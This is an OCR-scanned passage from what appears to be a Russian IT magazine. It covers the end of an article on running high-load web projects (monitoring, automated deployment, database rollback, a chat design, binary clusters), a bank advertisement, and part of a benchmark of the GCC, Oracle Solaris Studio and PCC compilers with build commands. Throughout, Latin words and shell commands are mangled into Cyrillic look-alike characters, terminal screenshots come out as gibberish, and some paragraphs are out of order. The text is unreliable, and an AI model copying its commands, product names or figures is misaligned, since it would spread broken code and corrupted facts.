готовку новых серверов для новых 
шардов. 

Или во время выборов пользо- 
ватели начинают активно перепи- 
сываться, а несколько групп резко 
растут в размерах. Наблюдение 
за такими параметрами поможет 
тебе реагировать проактивно, 
например подготовить для оппо- 
зиционеров отдельный сервер 
и перенести крупные группы туда 
:). Это удобно во всех отношениях. 

Кстати, мониторинг бизнес- 
показателей — это основной 
инструмент, как ни странно, и про- 
гнозирования нагрузки. Если ты 
знаешь темпы роста своего сайта, 
то сможешь подсчитать нагрузку 
через неделю или месяц. 

Специализированный 
технический мониторинг дает 
информацию о работе отдель- 
ных подсистем твоего проекта, 
причем именнотвоего проекта. 

Ты сможешь увидеть залипания 
каких-то отдельных сервисов 
и реагировать именно на них. На- 



пример, картинки в фотоальбоме 
стали отдаваться очень медлен- 
но — один из серверов вышел 
из строя и на синхронизацию с его 
заменой уходит очень много вре- 
мени. Или в одном из голосований 
количество проголосовавших 
выросло до миллиона и проверка 
на уникальность голоса теперь 
идет слишком долго. 

Нормально ли так пускаться 
в детали? Да, нормально. При- 
веду пример — на последней 
конференции НідЫоасІ++ Олег 
Илларионов из «ВКонтакте» рас- 
сказал о том, что они постоянно 
мониторят отдачу картинок и ино- 
гда вручную обрабатывают рост 
интереса к какой-то конкретной 
картинке. 

Примером такой картинки Олег 
назвал аватарку Павла Дурова, 
что вовсе не удивительно! Кстати, 
она не лежит в стандартной 
системе хранения и доставки 
контента «ВКонтакте». Аватарка 
Павла Дурова — это статика, раз- 
ложенная на все фронтенды, и от- 
дается вместе со всеми С55- и Э5- 
файлами и другими картинками 
оформления. 

Это оченьхороший пример 
крупной системы — простое 
решение проблемы, которую 
заметили с помощью хорошо про- 
строенного мониторинга. 

ВОССТАНОВЛЕНИЕ 

Итак, мы не просто построили круп- 
ную систему, мы построили класс- 
ный мониторинг. Мы знаем все, что 
происходите системе, в каждом 
ееуголке. Что делать, если мы 
обнаружили проблему? Все сред- 
ства восстановления должны быть 



Итак, применяя все изложенное в предыдущих уроках и на- 
чале этой статьи, мы построили масштабируемую высоко- 
нагруженную систему. Все узлы продублированы, введена 
некоторая избыточность оборудования. Это все? 

Нет, не все. Второй ключевой аспект крупного проекта — 
ты должен знать о нем абсолютно все! Все, что происходит 
в любой точке системы, любые аномалии в поведении отдель- 
ных элементов твоей программной системы нужно оперативно 
детектировать и анализировать. 

Обычно в мониторинг попадает некий джентльменский 
набор параметров вроде значения ІоасІ аѵегадез, количества 
чтений/записи с диска, свободного пространства на дисках, 
количества процессов, трафика. Это важно, но этого недоста- 
точно. Советуем также включить в мониторинг еще два вида 
параметров: 

• бизнес-пара метры, например количество регистраций за по- 
следнюю минуту, количество отправляемых сообщений, коли- 
чество поисковых запросов и другие. То есть та кие параметры, 
которые описывают поведение и работу бизнес-логи ки твоего 
проекта; 

• бол ее детальные специализированные технические параме- 
тры, например время отдачи отдельных страниц, задержка 
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автоматизированы. Еслиты сталкиваешься с какой-то проблемой 
более чем один раз — автоматизируй ее. Но большую часть авто- 
матизируй априори. 

Синхронизация сервера для хранения картинок должна про- 
изводиться скриптом. Изменение настроек — скриптом, настрой- 
ка нового сервера — тем более. Подробнее об этом стоит почитать 
популярную ныне тему ОеѵОрз, а мы приведем несколько ключе- 
вых мыслей из доклада Александра Титова и Игоря Курочкина про 
организацию системного администрирования в компании Бкуре. 

Естьодна притча, которая описываетэволюцию. Когда царь 
пришел к мудрецу и спросил его; «Как устроена Земля? Почему 
она не падает?», мудрец ответил: «Земля стоит на льве». Тогда 
царь спросил: «Хорошо. Почемулев не падает?» — «Лев стоит 
на слоне». — «Почему слон не падает?» — «Слон стоитна черепа- 
хе. Больше не спрашивайте меня, потому что дальше идут одни че- 
репахи». Один сервер — это, по сути дел а, оно и есть, основа всего. 

С одним сервером все понятно. Он просто администрируется 
одним специалистом, который владеет полной информацией о со- 
стоянии этого сервера — все умещается у него в голове. Дальше 
идет следующий уровень — пять серверов. По большому счету, 
подходы те же самые, но уже начинается обобщение и автома- 
тизация. Появляются скрипты, решающиету или инуюзадачу 
системногоадминистрирования. Больше двадцати машин — 
это в первую очередь большая система. Уже на этом уровне воз- 
никают проблемы из-за разницы конфигураций. Разные версии 
ЫРС на одном сервере работают, на другом сервере не работают. 
Разные версии РНР, РиЬу. Все это достаточно знакомо многим. 

Начинаеттребоваться большое количество документации. 
Каждое изменение ты должен прописать — ведь когда раз- 
личного рода неочевидных изменений станет много, ты нач- 
нешь их забывать. На количестве машин больше двадцати 
стоимость поддержки сильно превышает стоимость внесения 
изменений. Ты перестаешь вносить изменения, ты постоянно 
исправляешь ошибки. 

В этот момент начинает приходить понимание, что надо 
управлять не одной машиной, а какой-то абстрагированной 
штукой — кластером. Потребуется ввести автоматическую 
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установку машин, автоматическое 
управление конфигурациями, ав- 
томатическое развертывание сер- 
висов и автоматическую выкатку. 
Про автоматическую выкатку надо 
поговорить подробнее. 

ОЕРІОѴМЕМТ 

Вопрос про сіеріоутепі — это очень 
важная вещь. Нужноуметь перевы- 
катывать весь свой сайт на новое 
голое железо за 20 минут (без учета 
времени копирования данных). Во- 
прос владения своей инфраструк- 



турой оченьсерьезный, особенно 
если возникаетнеобходимость 
масштабироваться или, скажем, 
выкатываться в облако. 

Допустим, сломался конкрет- 
ный сервис. Поднимаем данные 
из бэкапов. Если на подъем всего 
проекта заново уходит день, воз- 
можно, этот день будет фатальным 
для твоего бизнеса. Аппагоп в этом 
плане очень правильно учит 
людей. Когда ты берешь машину 
ЕС2, она может перезагрузиться 
в любую секунду, и там не оста- 



НІ6НЮА0-ИНСТРУКТ0РЫ 



Олег Бунин 

Известный 

Я специалист 
по НідЫоасІ- 
проектам. 

Его компания 
«Лаборатория 
Олега Бунина» 
специализиру- 
ется на консалтинге, разработке 
и тестировании высоконагру- 
женных веб- проектов. Сейчас 
является организатором конфе- 
ренции НідЫоасІ++ ( ѵѵѵѵѵѵ.ЫаЫоасІ. 
ги). Это конференция, посвящен- 
ная высоким нагрузкам, которая 
ежегодно собирает лучших в мире 
специалистов по разработке 
крупных проектов. Благодаря 
этой конференции знаком со все ми 
ведущими специалистами мира 
в ысокона груженных систем. 



Константин Осипов 

Специалист 
по базам данных, 
который долгое 
время работал 
в МуБОЕ, где от- 
вечал какразза 
высоконагру- 
женный сектор. 
Быстрота МуБОЕ — в большой 
степени заслуга именно Кости 
Осипова. В свое время он зани- 
мался масштабируемостью МуБОЕ 
5.5. Сейчас отвечаете МаіЕРи 
за кластерную МоБОЕ базу да иных 
Тагап^ооІ, которая обслуживает 
500-600 тысяч запросов в секунду. 
Использовать этот О реп Бои гее 
проект может любой желающий. 



МаксимЛапшин 

Решениядля 
организации виде- 
отрансляции, ко- 
торые существуют 
вмиренаданный 
момент, можно 
пересчитатьпо 
пальцам. Макс 

разработал одно из них — Егіуѵісіео 
( егіѵѵісіео.ога і. Это серверное прило- 
жение, котороезанимается потоко- 
вым видео. При создании подобных 
инструментов возникаетцелая куча 
сложнейших проблем со скоростью. 

У Максима также есть некоторый 
опыт, связанный с масштабировани- 
ем средних сайтов (не таких крупных, 
какМаіІ.Ри). Под средними мы под- 
разумеваем такие сайты, количество 
обращений ккоторым достигает 
около 60 миллионов в сутки. 



Константин Машуков 

Бизнес-аналитик 
в компании Олега 
Бунина. Констан- 
тин пришел из 
мира суперком- 
пьютеров, где 
долгое время «пи- 
лил» различные 
научные приложения, связанные 
с числодробилками. В качестве 
бизнес-аналитика участвует во 
всех консалтинговых проектах 
компании, будь то социальные сети, 
крупные интернет-магазины или 
системы электронных платежей. 
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нется ничего, никаких данных, и нужно иметь возможность 
выкатываться на голый Ыпих в течение минут. 

Чтобы нормально жить в условиях меняющегося железа 
и нового подключающегося железа, тебе необходимо владеть 
своей инфраструктурой и быть уверенным в том, что и ини- 
циализация новых серверов тоже будет работать. Это первое, 
что нужно сказать о беріоутепі. 

Второе — это вообще процесс выкатывания обновления 
сайта. Пусть мы взяли админа и админ нам обещает, что он 
в случае чего все выкатит за час. Поверим его обещаниям, 
хотя, конечно, не стоит :). 

Дальше в дело вступают программисты. Программиста 
спрашивают: «Покажи на сайте новую вещь». Он говорит: 

«У нас апдейты выходят раз в неделю». Можно так работать? 
Нет, так работать нельзя. 

Выкатывание новой версии на сайт должно произво- 
диться максимально легко. Опять же это нужно, чтобы ты мог 
быстро пробовать новые вещи, чтобы можно было легко и бы- 
стро поправить. За что не любят в вебе Эаѵа? Помимо прочих 
причин, одна из проблем — надо долго компилировать. Нель- 
зя взять и быстро выкатить на сайт, хотя это бывает нужно. 
Что бы кто ни говорил, но даже в самых больших и крупных 
проектах иногда бывает редактирование кода на продакшне. 
Просто кто-то в этом признается, а кто-то не признается. 

В любом крупном проекте такое иногда бывает. Все зависит 
оттого, как именно организован деплой. 

Есть разные способы все это упростить, автоматизиро- 
вать. Но в любом случае все должно быть подконтрольно, 
никаких магических выкатывалок, никаких «оно как-то 
расползается по кластеру». Это означает, что ты не контро- 
лируешь процесс, а раз не контролируешь, то он неизбежно 
сломается, приведя к серьезным трудноуловимым ошибкам. 

Существует большое количество инструментов для де- 
плоймента, изучи и выбери оптимальный для конкретной 
ситуации. Например, библиотека Сарізігапо. Ты описываешь 
в специальном формате процесс выкатки, прописываешь 
списки серверов, библиотеки кода, что и куда выкатывать, 
что и где перезапускать. И далее процесс выкатки упрощает- 
ся до запуска управляющей команды. 

ПРОЦЕСС ОТКАТА 

Мы упомянем также и о процессе отката — что делать, если 
обновление, которое ты только что выкатил, сломалось в бое- 
вых условиях? Нужно оперативно и быстро откатиться назад. 
Автоматизация процесса отката — это, конечно, чистая магия, 
о которой мы в нашей статье говорить не будем. 

Но один совет для того, чтобы облегчить процесс отката, 
приведем. Основная проблема отката — это изменения 
в базе данных. Отсюда вывод — любое изменение в базе 
данных должно быть оформлено в виде файла с конкретными 
501-командами. Этот файл должен быть положен в репози- 
торий, и именно этот файл выполняет скрипт деплоймента 
для выкатки новой версии схемы базы данных. Вместе с этим 
файлом ты также можешь класть и файл, содержащий 501- 
команды для отката к предыдущему состоянию схемы СУБД. 

Ясно, что это должны быть автономные атомарные коман- 
ды. Допустим, ты добавляешь новое поле в регистрационную 
информацию пользователя. Значит, 501-файл, который 
нужно выполнить до выкатки требуемого кода на боевые сер- 
веры, содержит команду абб соіитп, а 501-файл для отката 
к предыдущей версии этот же столбец удаляет. 

Опять же ясно, что программный код не должен ломаться 
оттого, что пришел лишний столбец или, наоборот, нужный 
столбец в базе данных не существует. Операция деплоя 
не атомарна, ситуация, когда код уже новый, а изменения 
в СУБД до реплики не докатились, теоретически возможна. 



Еѵеп(-сІгіѵеп чат 




На магии выкатки мы и закан- 
чиваем наш учебник. В качестве 
добавки рассмотрим еще несколь- 
ко основных паттернов проекти- 
рования. 

ЧАТ 

Сакральный чат — ну какой про- 
граммистне писал его? Рассмотрим 
простую схему простой переписки 
между пользователями. Какреа- 
лизовать моментальное появление 
новых сообщений в окне переписки? 

Итак, каждый новый кли- 
ент устанавливает соединение 
с одним из «быстрых» серверов 
(например, Мобе.]5), от него 
Эаѵа5сгірС работающий в бра- 
узере клиента, будет получать 
новые сообщения, обрабатывать 
их и выводить в окне переписки. 
Получение будет происходить 
в режиме АЗАХ Іопд РоІІіпд (по- 
стоянно открытое соединение). 

Отправка на сервер ново- 
го сообщения идет на основной 
РНР-сервер, который записывает 
его в постоянную базу данных 
для истории (например, Му501) 
и «быструю» базу данных. В «бы- 
строй» базе хранится только 
актуальная переписка, например 
за последний день. В нашем слу- 
чае будем использовать для го- 
рячей информации базу данных 
МопдоОВ. 

Атеперь ответ на вопрос, 
почему такой странный выбор — 
МопдоОВ и Мобе.]5. Все поступа- 
ющие сообщения мы записываем 
в коллекцию для репликации, 
которую в качестве слейва слуша- 
ют серверы Мос1е.)5. 



Каждый из Мос1е.)5'ов знает 
идентификаторы всех клиентов, 
с которыми у него установлена 
связь. Если из потока репликации 
приходит сообщение для одного 
из своих клиентов, то забира- 
ем его и отправляем в браузер 
клиента. 

Нам даже перекодировать 
ничего не надо, так как формат 
коммуникации между МопдоОВ- 
серверами, Мос1е.)5 и формат хра- 
нения данных в МопдоОВ — Э50М. 

БИНАРНЫЙ КЛАСТЕР 

Еще один часто встречающийся 
паттерн в проектировании — ис- 
пользование бинарных кластеров. 
Под этим устойчивым словосочета- 
нием понимается следующее. 

Весь пул бинарных файлов (кар- 
тинки, видеофайлы) разделяется 
на самые обычные шарды. Но каж- 
дый из шардов состоит из двух 
и более серверов, информация 
на которых полностью дублируется. 

Далее возможны варианты — 
ты можешь объединить серверы 
в группе бинарного кластера с по- 
мощью ЬеагіЬеаІ или САРР-решения 
(основной сервер и резервный) или 
просто распределить трафик на не- 
сколько серверов с помощью какой- 
нибудь простой балансировки. 

Подобным решением достигается 
одновременно и масштабируемость, 
и надежность. Просто единицей 
масштабируемости является не один 
сервер, а сразу группа серверов, 
именуемая бинарным кластером. 

Пожалуй, и все, остановимся 
на этом, так как о примерах можно 
говорить бесконечно. Удачи! зс 
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на правах рекламы 



В ДЕКАБРЕ 

ТОЛЬКО ДЕРЖАТЕЛЯМ 

«МУЖСКОЙ КАРТЫ» 

подарочные сертификаты 
от магазина Студии Артемия Лебедева* 




* ПОДРОБНОСТИ НА УУШУ.МАНСАКР.КЦ 




Оформить дебетовую или кредитную «МУЖСКУЮ КАРТУ» 
можно на сайте ѵѵѵѵѵѵ.аІІ'аЬапк.ги или по телефонам: 

8 (495) 788-88-78 в Москве 

8-800-2000-000 в регионах России (звонок бесплатный) 



МАХШ А Альфа-Банк (ОВІЛВИВШІ 

мтскои ЖУРНАЛ С ИМЕНЕМ ^ ттттшшш 



ОАО «Альфа-Банк». Генеральная лицензия банка России на осуществление банковских операций от 05.03.2012 №1326" 





иміхот 



Роман Ярыженко (готтапіогауапсіех.ги) 




Большие гонки 




ОБЗОР И СРАВНЕНИЕ ПРОИЗВОДИТЕЛЬНОСТИ 
СОВРЕМЕННЫХ КОМПИЛЯТОРОВ 



Долгое время стандартом де-факто для ком- 
пиляции С/С++ кода в *піх-системах был 6СС. 
Но в последние годы в этой области возникли 
новые веяния, такие как ІІѴМ/СІапд, Огасіе 
Сотрііег ЗиЛе и возрожденный из забвения 
РСС. Давай посмотрим, могут ли они составить 
конкуренцию безраздельно правящему набору 
компиляторов от проекта бМУ. 



ВВЕДЕНИЕ 



Прежде всего, хочу сказать несколько слов о проведенных тестах 
и бенчмарках. Во-первых, решено было скормить компиляторам 
(тем из них, что поддерживают С++) библиотеку Воозі, которая 
агрессивно использует функции С++ (к примеру, шаблоны и некото- 
рые инструкции препроцессора) и оказывается своего рода камнем 
преткновения для некоторых компиляторов. Во-вторых, бенч- 
марки на скорость компиляции. Ктаковым я отнесу, помимо уже 



упомянутой компиляции библиотеки ВооБІ (отчего бы не убить двух 
зайцев?), компиляцию стабильных версий АрасЬе и ІтадеМадіск. 
В-третьих, качество кодогенерации. Я решил не только сравнить 
размеры выходных исполняемых файлов, но и проверить, насколь- 
ко быстро выполняется ^оЬп іЬе Ріррег и Ь2Ір2. 

Тестировалось все это дело на компе следующей конфигурации: 
Р4 530 3 ГГц, 2 Гб РАМ, НОВ Веадаіе 5Т31000528А5. 



6СС 4.6.3 и 4.8 



Первая бета-версия 6СС появилась в далеком марте 1987 года. 
Тогда аббревиатура 6СС расшифровывалась как 6МІІ С Сотрііег. 
На тот момент компилятор поддерживал архитектуры ѴАХ, 5СІМ 
и т68к. В 1991-м была готова первая стабильная его версия, 
а в 1994-м, начиная с версии 4.4В50, его сделали компилятором 
по умолчанию в большинстве В50-систем. Одно время существо- 
вал форк 6СС — Е6С5, но в 1999-м их объединили вновь. 

В настоящее время 6СС заявлена поддержка следующих 
стандартов С: 

• С89сисправлениями от1994и 1996 годов, связанными, 
в частности, с геіигп и локалями; 

• поправки кС89 от 1995 года — некоторые называют 
это С94или С95; 
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Большие гонки 



I V Т4рмннал^гатв№піі'^мкі«^-^/Ьеоіі^[ліпк - + х 

файл Ораека Бид Іер**инал П^р^ход ^прмка 
І^сс . соійрііе . С++ Ьіп Ф ѵ2/1іЬ«/йаі)іУ Ьи ііеі/^сс - 4 . б/г еіеа^е/іЬгеаіЛп ^ - йші^і/^йИі 
ііігеі.о 

Івсс . сотрі 1е . с++ Ьіп ^ ѵ2/ ІіЬъ/лиіЬ / Ьиіііі/ ^сс -4 ^ б/ геіеаіа/ ТИгаабіпв - піііі/ ірИ_пашп4 
ІппІ^п 

\^сс . Ііпк . е111 Ып . ѵ2/ІІЬ& /шаіН / ЬыіІ^/ - 4 . 6/ге1еа&«/ іИгеаеІіп^ - шііііі/ ІІЬЬййзг.ші 
:Ь_гПІ.іОИ,52.0 

|со«поп , сору ІІ48» / 1 ІЬ/ 1 іЬЬоо5Т_іиТІиігі 1 , :ао . 1 , 62 х 9 
[1п - ин I X 5іац* Л іЬ/1іЬЬоо$і_вді[і_гг 1 1 + ао 

{ ^сс . сошрііе . Ьіп . ѵ2/1іЬа/шаіЬ/ЬиііЬ/ 0сс -4 . б/геіеаіе /іыеаіііпі- юиісі/асоаь . о 

ІЕ.СС X ссипрііе X С++ Ьіп . ѵ2 /ііЬа/ ліаіЬ /Ьиііб - 4 . б/ге1еаае/ТЬгеаЬіп^ - шПі/ааіпЬ . о 

!дссхсооірі1в.с++ ЬіПхѴ2/1іЬа^таіЬ/ЬуіІб/дсс-4хб/гв1»4ае/ТЬго«(ііп5-іпи1і:і/лівпЬхО 
І8СС . сошрііа X С++ Ьіп . ѵ2 / ІіЬ^/іпаіЬ /ЬиііЬ/ ^сс -4 . б/ ге1еааа/і ЬгеаЬіп^ - шПі / сЬгі . о 
І8СС X сотрііе X с-*‘+ Ьіп х ѵ2/1іЬа/іиіЬ / Ьиііб/^сс -4x6/ гоіааае /іЬгалбіпв - вші іі/ соруаіяп х 

'О 

1{сс X совфііе X Ьіп X ѵ2/ ііЬа/ паі^Ь/ Ьиіі^/ ^сс - 4 х б/геІЁааЁ/1гЬгеаіІіп ^ - пиііі/ёг^с х п 
І 8.СС . ссипрііе X С++ Ьіп х ѵ2 / ІІЬі/таіЬ / ЬиіІЬ / '4-6 /геіеаае /гЬгеаЬіпЕ - пшііі/ег/ , о 

|хххОП 299ТЬ іагвеіххх 

і Есс X солрііе X с*+ Ьіп X ѵ2/ІіЬа/пэгь / Ь уіісі/есс - 4 х б/геіеаае / іЬгеаЬіпЕ - пѵііі/ехрші х о 
:ЕССхС0вфі1ехС'>'+ ЬІПхѴ2/1іЬа/ваіЬ/Ьиі1с1/ЕССх4хб/ге1еаіе/(ЬгеаЕІілЕ-іш1(:і//Аа)[хй 

ксс X сошрііе . С++ Ьіп х ѵ2/1іЬа/ліаіЬ /Ьиііб /^сс -4 . б/ге1еа$е /ТЬгеаЬіпЕ - пшИі /іГяіп . о 
ІЕСС X ссюріів . с-*^+ Ьіп X ѵ2 / ІіЬа /шліЬ /Ьыііб/Есс -4x6/ геіаа» /ТЬгаасНіпЕ - шиНі /^рс Іааа і^ 
іухо 

сс X сойірііе X Ьіп X у2/1іЬа/іпаСЬ / Ь пііЬ/есс - 4 х б/геіеазе / і ЬгеаЬіпЕ - аііІсі/Ьурйі х о 

Компиляция Воо5( с использованием 6СС 

• поддержка стандарта С99, который включаете себятакие вещи, 
как тип ЬооІ, іпііпе-функции и массивы переменной длины, за- 
явлена (не полностью). 

Также в настоящее время в 6СС есть несколько дополнений, 
несовместимых со стандартами С. Ктаковым относятся, например, 
арифметика с указателями на функции, пустые структуры и масси- 
вы нулевой длины. 

«Постой! А как же С++?» — спросишь ты. Из стандартов при- 
плюснутого С заявлена поддержка С++03. Судя по всему, поскольку 
стандарт С++98 сочли имеющим ошибки, а С++03 фактически эти 
ошибки исправляющим, предыдущий стандарт не поддерживает- 
ся. Поддержка С++11, ранее носившего название С++0х, как и в слу- 
чае со стандартом С99, заявлена не полностью. Такие фичи, как, 
например, псевдонимы шаблонов, расширенное объявление «дру- 
зей» (напомню, ключевое слово І^гіепб позволяет одному классу 
напрямую обращаться к частным элементам другого), большинство 
возможностей, относящихся к параллелизму, не поддерживают- 
ся. Имеются также и расширения, несовместимые, как и в слу- 
чае с обычным С, со стандартами. Расширения эти относятся, 
например, к шаблонам, Ѵоіаіііе-объектам и интерфейсам. ССС 
версии 4.6.3 является стандартным для ІІЬипІи 12.04, его и будем 
тестировать. Не стану описывать, как я получал ту или иную про- 
грамму/библиотеку, а сразу начну непосредственно с компиляции. 
Первым тестом у нас будет Воозі (версия из 5ѴМ). Все команды, 
рассматриваемые далее, выполняются относительно каталога 
с исходниками. 

Сначала собирается средство сборки самого Воозі — Ь)ат: 

$ ссі 1:ооІ5/Ьиі1сІ/ѵ2 

$ ./Ьоо1;5І;гар. 5І1 --ыі1;Іі-1;ооІ5е1;=§сс 
$ зисіо ./Ь2 Іп5і;а11 1;ооІ5е1;=§сс 
$ с6 

По умолчанию он устанавливается в /изг/іосаі. 

После этого редактируется файл в домашнем каталоге поль- 
зователя — и5ег-сопЯд.)ат. Поскольку в нем всего одна строчка, 
используем есЬо: 

$ есбо "и5Іп§ §сс > ~/и5ег-сопб§.]ат 

Ауже затем компилируется собственно Воозі (мне понадобилось 
установить пакет 2 ІіЫ-беѵ): 

$ 1;іте Ьдаш 

Время компиляции — 25 мин 52 с, но собрался он без ошибок. 



*•«* Омаи км Хгрнм 3»««— » коріммім Слрми 

Домшк— ОМИШШЬММУ х 1.. Гам«*-кіім«Гамрм*-І^ я і > ШЛІ *мітЬ» Ипаі ці Иійг- ■ | і 




' ; 




_ 


ЬЬѴМ Ьапдиа^е КеГегепсе Мапиаі 





1. АЫігая 

2. ітКгогіііПЬпп 

Х М#и1іЯ»га 

4. ШуЬ I *ѵ»1 Яшгпіг» 

1. Мо4и>> Япіяаг» 

2. I «>гя|» Турч 

1. 'иіпіЧ' I иіЬдііг 

2. міу«» 

3. 'ІМ4И амігііі мі' 1 Іпкцг 

4. •■-—»»хГ I тЬ«|» 

5. іпгімііі' ЦПІИІГ 

6. I 

7. іишоЮйкавс 

4 лиіІУпЬик 

9. ^ниоіааі1і<ІІікі(С 

10. • 1 і-Ь-у. 

И. 'ІііАж. «4»' ИяЬ*|# 

12. Чиоик! Юг аді іиОг' Цп>Ц4 

13. ~м| по' I ІПІЩТ 

14. •«.»«ХІЦІ'І1ДІЦ|» 

16. 'иіі^я^хх' I <ЯІГ»|» 

3. ГаІІіпу Гши гапііпис 

4. матебтяш 

$. Дп»іаІѴ<гі^Ы». 

6. ГипДкмм 

7. А1і*і»« 



У ІІѴМ неплохая документация 

При компиляции АрасЬе, чтобы поддерживать несколько ском- 
пилированных разными компиляторами версий с целью сравнить 
их размер, необходимо создать каталог, из которого будет вызы- 
ваться сопЛдиге, находящийся в каталоге с исходниками. Компи- 
лировался АрасЬе 1 мин 52 с, размер же собственно исполняемого 
файла Ьирб составил 706 497 байт. Для компиляции ІтадеМадіск 
производились те же самые операции, что и для АрасЬе. Время его 
компиляции составило 12 мин 4 с. 

Перейдем к ЗоЬп іЬе Ріррег; размер выходного файла, ЗоЬп, 
составил 227 524 байта, а бенчмарк М05 — 7732 с/з. Сжатие файла 
размером 1450 Мб Ь2Ір2, который, к слову, чтобы не возиться 
с копированием версий, необходимо распаковывать для каждой 
компиляции в свой каталог, и исполняемый файл которого весит 
215 914 байт, заняло 7 мин 56 с. 

Тестже ОрепВВІ (АЕ5-СВС-256) показал, что при размере блока 
8192 байта в секунду обрабатывается 35 438,59 тысячи байт (имен- 
но тысячи, не «кило»). А для Р5А с длиной ключа в 512 бит может 
быть подписано 2214,2 сообщения в секунду. 

6СС 4.8, который сейчас активно разрабатывается, имеет сле- 
дующие новинки: 

• Нынеон реализован не на С, а на С++. 

• Появился новый уровень оптимизации, -Од. Этот уровень разра- 
ботан для быстрой компиляции и отладки, но при нем производи- 
тельность программы должна оставаться приемлемой. 

• Добавлена опция для контроля оптимизации частичных избы- 
точностей (РРЕ). 

• Для архитектуры х86/х64 добавлены функции времени выпол- 
нения, которые позволяютопределитьтип и возможности про- 
цессора. 

Исходники доступны через 5ѴМ, поэтому для их получения 
вводим следующую команду: 

$ зѵп со 5ѴП ://§сс .§пи .ог§/зѵп/§сс/1:гипк §сс-1:гипк 

Компиляция потребует некоторых танцев с бубном — помимо того 
что у тебя должны быть установлены соответствующие инструмен- 
ты (лично мне понадобилось доустановить пакеты дсс-тиКіІіЬ, д++- 
плиКіІіЬ, ІіЬтрІ'г-сІеѵ и ІіЬтрс-сІеѵ), придется произвести некоторые 
операции: 

$ зисіо 1п -5 /изг/іпс1исІе/і386-1іпих-^пи/^пи/5І:иЬ5-32. б <-■ 

/изг/іпсіисіе/^пи/ 

$ зисіо 1п -5 /и5г/1іЬ/і386-1іпих-§пи/сг1 ;* .0 /изг/ІіЬ/ 

$ ССІ ^сс-1:гипк 

$ ./сопб§иге && таке 

$ зисіо таке іпзііаіі 
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Бенчмарк с использованием ОрепЗЗІ 
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Так выглядит Огасіе Зоіагів Зіисііо 



Несмотря на то что, казалось бы, совместимость не должна 
была сколько-нибудь сильно измениться по сравнению с 4.6.3, 
Воозі толком не скомпилировался. Для остальных тестов приведу 
просто цифры: 

• Компиляция АрасЬе — 1 мин 52 с, размер исполняемого файла — 
706 947 байт. 

• Компиляция ІтадеМадіск — 21 минЗЗс. 

• Размер исполняемого файла ЗоЬп — 217880 байт, бенчмарк 
М05 — 7927с/з. 

• Ь2Ір2 (размер) — 234163 байта, время сжатия файла — 7 мин 52 с. 

• Бенчмарк Ореп551АЕ5-СВС-256 при размере блока 8192 — 

39 209,64тыс.байт/с,Р5А512 — 2222зідп/с. 



СОМРІГЕРБУІТЕ 



Набор компиляторов Сотрііег зиііе входит в состав Огасіе Боіагіз 
Біисііо (несмотря на название, эта ЮЕ предназначена не только 
для ОС Боіагіз). Некоторые заявленные фичи компилятора С: 

• поддержка как С89, таки С99; 

• диалектК&Р и возможностьсмешения АМ5І С и К&Р; 

• поддержка стандарта ОрепМР С для распараллеливания; 

• поддержка прекомпилированныхзаголовочныхфайлов 
дляуменьшения времени компиляции; 

• библиотека сборки мусора дляуправления кучей и отслежива- 
ния в рантайме утечек памяти. 

С++ (компилятор что для С, что для С++ одинаков): 

• стандарты С++98 и С++03; стандарт С++11, по-видимому, поддержи- 
вается не полностью, причем до такой степени не полностью, что 

в Огасіе постеснялись говоритьдаже о частичном соответствии; 

• можно вы би рать из библиотек шаблонов стандартную библиоте- 
ку 5ип либо БТЕРогІ; 

• поддержка библиотеки ВоозЕ 

«Это все, конечно, хорошо, но где мне достать эту ЮЕ? Она же 
наверняка платная», — скажешь ты. Да, когда-то она стоила денег, 
но сейчас распространяется бесплатно. Для ее получения перейди 
на ЬіЕіѵ/5902пі. зарегистрируйся в Му Огасіе и вперед, качай. 

Но скачать мало — надо же еще и установить. А вот с этим придется 
повозиться чуть больше, чем обычно, — пакета для ОЬипІи нет, 
как и установочного скрипта. Впрочем, это «больше» именно что 
«чуть» и заключается всего-навсего в том, чтобы распаковать 
в нужную директорию и установить пути. 

Перейди в каталог, содержащий скачанный архив, и набери 
следующие команды (я использовал стандартный каталог/орЕ 
но тебе ничто не мешает использовать /изг/іосаі или даже свой 
домашний): 



$ Ьипір2 5о1агіз51:исІіо12.3-1іпих-х86-Ьіп.1;аг.Ь22 
$ зисіо Еаг х-р 5о1агіз51;исІіо12. 3-Ипих-хВб-Ып.Еаг -С /орЕ 

$ ехрогЕ РАТН="/ор1:/5о1агІ551:исІіо12. 3-1іпих-х86-Ьіп^ 

/50ІагІ55І:исІіо12. 3/Ьіп : /ор1і/5о1агІ551:исІіо12. З^-- 

-1іпих-х86-Ьіп/50ІагІ5 5І:исІіо12. 3/ргосІ/Ьіп :$РАТН" 

Затем добавь эти пути в /ек/епѵігоптепЕ 

Попытка сборки Воозі с использованием данного компилятора 
благополучно провалилась. Да нет, разумеется, какая-то часть со- 
бралась, но, как говаривал старик Хоттабыч, «чуть-чуть не счита- 
ется, о драгоценнейший». 

Чтобы скомпилировать АрасЬе, в дополнение ктем операциям, 
что описаны в разделе по 6СС, необходимо установить переменные 
окружения. В моем случае это выглядело так: 

$ ехрогЕ СС=сс СХХ=сс 

С ІтадеМадіск необходимо провернуть этотже трюк. 

Перед компиляцией ЗоЬп'а (как, впрочем, и перед компиля- 
цией Ь2Ір2) необходимо подредактировать МакеПІе: вместо дсс 
поставить сс и убрать опции, начинающиеся с -ѴѴ, поскольку 
оракловский компилятор их не понимает. Для компиляции же 
ОрепББЕ потребуется поставить пакеты ЬаррусосІегз-ІіЬзоскеІ 
и ЬаррусосІегз-ІіЬзоскеІ-сІеѵ, создать симлинки в /изг/ІіЬ: 

$ 1п -5 /изг/ИЬ/ІіаррусосІегз/ІіЬ* /изг/ІіЬ/ 

и выполнить в каталоге ОрепББЕ следующую команду: 

$ ./Сопб§иге зоІагіз-хВ б- сс 

Результаты тестов: 

• Компиляция АрасЬе — 1 мин 39 с, размер исполняемого файла — 
766368байт. 

• Компиляция ІтадеМадіск — 23 мин 56 с. 

• Размер исполняемого файла ЗоЬп — 178 756 байт, бенчмарк 
М05 — 6942с/з. 

• Ь2Ір2 (размер) — 180381 байт, время сжатия файла — 8мин25с. 

• Бенчмарк 0реп55ЕАЕ5-СВС-256 при размере блока 8192 — 

76 371, 29тыс. байт/с, Р5А512 — 849,7зідп/с. 



РСС 



РогІаЫе С Сотрііег — самый древний компилятор из рассматрива- 
емых здесь. Он был разработан АТ&Т в 1975-1977 годах, включен 
в СІМІХ Ѵ7 и вместо Іех использовал уасс. Являлся компилятором 
по умолчанию до 4.4В50, потом его заменил 6СС. Какое-то время. 
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Большие гонки 



т терминал -гат9^й(№(й'1к(ор^-/1и^р2<еип8'I:^/ЬIір2■1Л^б - + х 

